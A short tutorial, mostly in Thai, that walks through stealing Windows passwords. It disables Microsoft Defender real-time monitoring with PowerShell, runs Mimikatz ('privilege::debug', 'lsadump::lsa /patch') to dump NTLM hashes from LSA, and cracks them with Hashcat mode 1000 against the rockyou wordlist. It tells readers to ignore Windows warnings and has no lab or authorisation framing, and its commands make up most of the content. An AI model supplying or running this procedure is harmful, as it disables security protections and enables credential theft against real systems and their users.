How to dump password on WindowsOS via Minikaz

Step 1: อันดับแรกจะต้องทำการปิด Antivirus บน Windows ก่อน โดยเราสามารถเข้าไปยัง Powershell ด้วยสิทธิ Admin แล้วพิมพ์คำสั่งดังนี้

# Disable Realtime Protection 
Set-MpPreference -DisableRealtimeMonitoring $true

Step 2: จากนั้นเข้าไป Download ไฟล์ Minikatz.exe ได้ตาม Link Download Minikaz ได้เลย

Step 3: Run Minikatz ด้วยสิทธิ Admin (ไม่ต้องตกใจหากมีการเตือนจาก Windows)

Step 4: รันคำสั่ง

# ตรวจสอบว่าได้ผลลัพธ์เป็น "Privilege '20' ok" หรือไม่ หากไม่ได้ให้รันด้วยสิทธิ Admin
privilege::debug

# Dump hashes
lsadump::lsa /patch

Step 5: Download Hashcat Link Download Hashcat

# ตรวจสอบ Hashcat 
hashcat --help 
# เลือกใช้ Mode 1000 ซึ่งเป็นการ Crack NTLM Hash 
hashcat -m 1000 <hash> rockyou.txt --show

# Example
#hashcat -m 1000 7ce21f17c0aee7fb9ceba532d0546ad6 rockyou.txt --show

Step 6: ถ้า Crack สำเร็จเราจะได้รหัสผ่านกลับมาตามภาพ ซึ่งความเร็วจะขึ้นอยู่กับประสิทธิภาพของเครื่องที่ใช้ Crack และสามารถใช้ Graphic Card ประมวลผลได้